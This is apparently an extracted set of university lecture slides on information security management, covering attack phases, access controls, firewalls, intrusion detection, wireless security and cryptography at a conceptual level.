INFORMATION SECURITY MANAGEMENT CHAPTER 10: PROTECTION MECHANISMS You got to be careful if you don’t know where you’re going, because you might not get there. – Yogi Berra




You got to be careful if you don’t know where you’re going, because you might not get there. – Yogi Berra

Windows XP

Zero days turn to "forever days"

Principles of Information Security Management

Include the following characteristics that will be the focus of the current course (six P’s):

1. Planning2. Policy3. Programs4. Protection5. People6. Project Management


• Planning as part of InfoSec management– An extension of the basic planning model discussed

earlier in this chapter

• Included in the InfoSec planning model – Activities necessary to support the design, creation, and

implementation of information security strategies

Planning (cont’d.)

• Types of InfoSec plans– Incident response planning– Business continuity planning– Disaster recovery planning– Policy planning– Personnel planning– Technology rollout planning– Risk management planning– Security program planning

• includes education, training and awareness


• The set of organizational guidelines that dictates certain behavior within the organization

• Three general categories of policy: – Enterprise information security policy (EISP)– Issue-specific security policy (ISSP) – System-specific policies (SysSPs)

UNCW Policies


• InfoSec operations that are specifically managed as separate entities– Example: a security education training and awareness

(SETA) program

• Other types of programs – Physical security program

• complete with fire, physical access, gates, guards, etc.


• Executed through risk management activities

– Includes:– Risk assessment and control– Protection mechanisms– Technologies– Tools

• Each of these mechanisms represents some aspect of the management of specific controls in the overall information security plan


Managers must recognize the crucial role that people play in the information security program

This area of InfoSec includes security personnel and the security of personnel, as well as aspects of a SETA program

The most critical link in the information security program

Project Management

Identifying and controlling the resources applied to the project

Measuring progress

Adjusting the process as progress is made

Target Incident – Topic Paper Presentation

Software Demo – Mark Grover

Hacking Networks

Phase 1: ReconnaissancePhysical Break-In

Dumpster Diving

Google, Newsgroups, Web sites

Social Engineering Phishing: fake email Pharming: fake web pages

WhoIs DatabaseDomain Name Server


Registrant: Microsoft Corporation One Microsoft Way Redmond, WA 98052 US

Domain name: MICROSOFT.COM

Administrative Contact: Administrator, Domain [email protected] One Microsoft Way Redmond, WA 98052 US +1.4258828080 Technical Contact: Hostmaster, MSN [email protected] One Microsoft Way Redmond, WA 98052 US +1.4258828080

Registration Service Provider: DBMS VeriSign, [email protected] 800-579-2848 x4 Please contact DBMS VeriSign for domain updates, DNS/Nameserver changes, and general domain support questions.

Registrar of Record: TUCOWS, INC. Record last updated on 27-Aug-2006. Record expires on 03-May-2014. Record created on 02-May-1991.

Domain servers in listed order: NS3.MSFT.NET NS1.MSFT.NET NS4.MSFT.NET NS2.MSFT.NET NS5.MSFT.NET

Hacking Networks

Phase 2: ScanningWar Driving: Can I find a wireless network?

War Dialing: Can I find a modem to connect to?

Network Mapping: What IP addresses exist, and what ports are open on them?

Vulnerability-Scanning Tools: What versions of software are implemented on devices?

Passive Attacks

Eavesdropping: Listen to packets from other parties = Sniffing

Traffic Analysis: Learn about network from observing traffic patterns

Footprinting: Test to determine software installed on system = Network Mapping

Hacking Networks:

Phase 3: Gaining Access

Network Attacks:Sniffing

(Eavesdropping)IP Address SpoofingSession Hijacking

System Attacks:Buffer OverflowPassword CrackingSQL InjectionWeb Protocol AbuseDenial of ServiceTrap DoorVirus, Worm, Trojan


Some Active Attacks

Denial of Service: Message did not make it; or service could not run

Masquerading or Spoofing: The actual sender is not the claimed sender

Message Modification: The message was modified in transmission

Packet Replay: A past packet is transmitted again in order to gain access or otherwise cause damage

Man-in-the-Middle Attack

(1) Login

(3) Password

(2) Login

(4) Password

Hacking Networks:

Phase 4: Exploit/Maintain Access


Trojan Horse


User-Level Rootkit

Kernel-Level Rootkit

Replaces systemexecutables: e.g. Login, ls, du

Replaces OS kernel:e.g. process or filecontrol to hide

Control system:system commands,log keystrokes, pswd

Useful utility actuallycreates a backdoor.

Slave forwards/performscommands; spreads,list email addrs, DOSattacks

Spyware: Collect info:keystroke logger,collect credit card #s,AdWare: insert ads,filter search results



Bots: Host illegal movies, music, pornography, criminal web sites, … Forward Spam for financial gain

China Hungary

Botnets: Bots


Distributed Denial of Service



Can barrage a victimserver with requests,causing the networkto fail to respond to anyone

Russia Bulgaria UnitedStates



• Threats -> Vulnerabilities -> Risk ->Controls

• Technical controls– Must be combined with sound policy and education,

training, and awareness efforts

• Examples of technical security mechanisms

Sphere of Protection

Source: Course Technology/Cengage Learning

Access Controls

• The four processes of access control– Identification– Authentication– Authorization– Accountability

• A successful access control approach always incorporates all four of these elements

Table 10-1 Password power

Source: Course Technology/Cengage Learning

Access Controls – Password Strength

Acceptability of Biometrics

• Note: Iris Scanning has experienced rapid growth in popularity and due to it’s acceptability, low cost, and effective security


• Any device that prevents a specific type of information from moving between two networks

Types:• Packet Filtering• Application Level• Stateful Inspection Firewalls

Packet filtering firewalls

Simple networking devices that filter packets by examining every incoming and outgoing packet header

Application-level firewalls

– Consists of dedicated computers kept separate from the first filtering router (edge router)

– Commonly used in conjunction with a second or internal filtering router - or proxy server

– Implemented for specific protocols

Stateful inspection firewalls

– Keeps track of each network connection established between internal and external systems using a state table

– Can restrict incoming packets by allowing access only to packets that constitute responses to requests from internal hosts

Firewall Architectures

• Each firewall generation can be implemented in several architectural configurations

• Common architectural implementations– Packet filtering routers– Screened-host firewalls– Dual-homed host firewalls– Screened-subnet firewalls

Firewall Architectures:Packet filtering routersMost organizations with an Internet connection use some form of router between their internal networks and the external service provider

Firewall Architectures:Screened-host firewall systems

• Combine the packet filtering router with a separate, dedicated firewall such as an application proxy server

Firewall Architectures:Dual-Homed host firewalls

• The bastion host contains two network interfaces1. One is connected to the external network2. One is connected to the internal network

Selecting the Right Firewall

• Firewall Technology• Cost• Maintenance • Future Growth

Managing Firewalls

• Any firewall device must have its own configuration• Firewall Rules• Policy regarding firewall use

• Firewall best practices– All traffic from the trusted network allowed out– The firewall is never accessible directly from the public

network– Email Policies

Intrusion Detection and Prevention Systems (IDPS)

• The term intrusion detection/prevention system (IDPS) can be used to describe current anti-intrusion technologies

• Like firewall systems, IDPSs require complex configurations to provide the level of detection and response desired

Intrusion Detection and Prevention Systems (cont’d.)

IDPS technologies can respond to a detected threat by attempting to prevent it from succeeding

Network or Host Based Protection

IDPS – Host vs. Network

Signature-Based IDPS

• Examines data traffic for something that matches the preconfigured, predetermined attack pattern signatures

• Weakness: slow and methodical attacks may slip undetected through the IDPS, as their actions may not match a signature that includes factors based on duration of the events

Statistical Anomaly-Based IDPS

• First collects data from normal traffic and establishes a baseline– Then periodically samples network activity, based on

statistical methods, and compares the samples to the baseline

• Advantage: Able to detect new types of attacks, because it looks for abnormal activity of any type

Managing IDPS

• IDPSs must be configured to differentiate between routine circumstances and low, moderate, or severe threats

• A properly configured IDPS can translate a security alert into different types of notifications

• Most IDPSs monitor systems using agents

• Consolidated enterprise manager

Honeypot & Honeynet

Honeypot: A system with a special software application which appears easy to break into

Honeynet: A network which appears easy to break into Purpose: Catch attackers All traffic going to honeypot/net is suspicious If successfully penetrated, can launch further attacks Must be carefully monitored

External DNS

IDS Web Server

E-Commerce VPNServer



Remote Access Protection

• Network connectivity using external connections – Usually much simpler and less sophisticated than Internet


– Simple user name and password schemes are usually the only means of authentication


• Systems that authenticate the credentials of dial-up access users

• Typical dial-up systems place the authentication of users on the system connected to the modems

• Options: • Remote Authentication Dial-In User Service

(RADIUS) • Terminal Access Controller Access


Authentication Protocols

RADIUS Over-the-wire protocol from client

to AAA (authentication, authorization, accounting) server


Source: Course Technology/Cengage Learning

Managing Connections

• Organizations that continue to offer remote access must:– Determine how many connections the organization has– Control access to authorized modem numbers – Use call-back whenever possible– Use token-based authentication if at all possible

Wi-Fi security

SSID should be a non-default value SSID broadcast should be disabled MAC access control Authentication

• Require ID and password, may use a RADIUS server

Encryption• WEP (Wired Equivalent Privacy)• WPA (Wireless Protected Access)• WPA2 (superset of WPA, full standard)

Managing Wireless Connections

• Regulate the wireless network footprint

• Select WPA or WPA2 over WEP

• Protect preshared keys

Scanning and Analysis Tools

• Used to find vulnerabilities in systems

• Security administrators may use attacker’s tools to examine their own defenses and search out areas of vulnerability

• Scanning tools • Footprinting• Fingerprinting

Pen Testing Article

“What is Penetration Testing?”

Port Scanners

• Port scanning utilities (port scanners)

Vulnerability Scanners

• Capable of scanning networks for very detailed information

• Identify exposed user names and groups, show open network shares, and expose configuration problems and other server vulnerabilities

Packet Sniffers

• A network tool that collects and analyzes packets on a network

• Connects directly to a local network from an internal location

Content Filters

• A software program or a hardware/software appliance that allows administrators to restrict content that comes into a network

• Common application of a content filter– Restriction of access to Web sites with non-business-

related material, such as pornography, or restriction of spam e-mail

Examples of Content Filters

Trap and Trace

• Trap– Describes software designed to entice individuals who

are illegally perusing the internal areas of a network

• Trace– A process by which the organization attempts to

determine the identity of someone discovered in unauthorized areas of the network or systems

Managing Scanning and Analysis Tools

• The security manager must be able to see the organization’s systems and networks from the viewpoint of potential attackers

• Drawbacks:– Tools do not have human-level capabilities– Most tools function by pattern recognition, so they only

handle known issues – Some governments, agencies, institutions, and

universities have established policies or laws that protect the individual user’s right to access content

– Tool usage and configuration must comply with an explicitly articulated policy, and the policy must provide for valid exceptions


• Encryption– The process of converting an original message into a

form that cannot be understood by unauthorized individuals

• Cryptology– The science of encryption– Composed of two disciplines:

– cryptography – cryptanalysis

Cryptography (cont’d.)

• Algorithm• Key• Keyspace




Cryptography Article

Choosing Key Sizes for Cryptography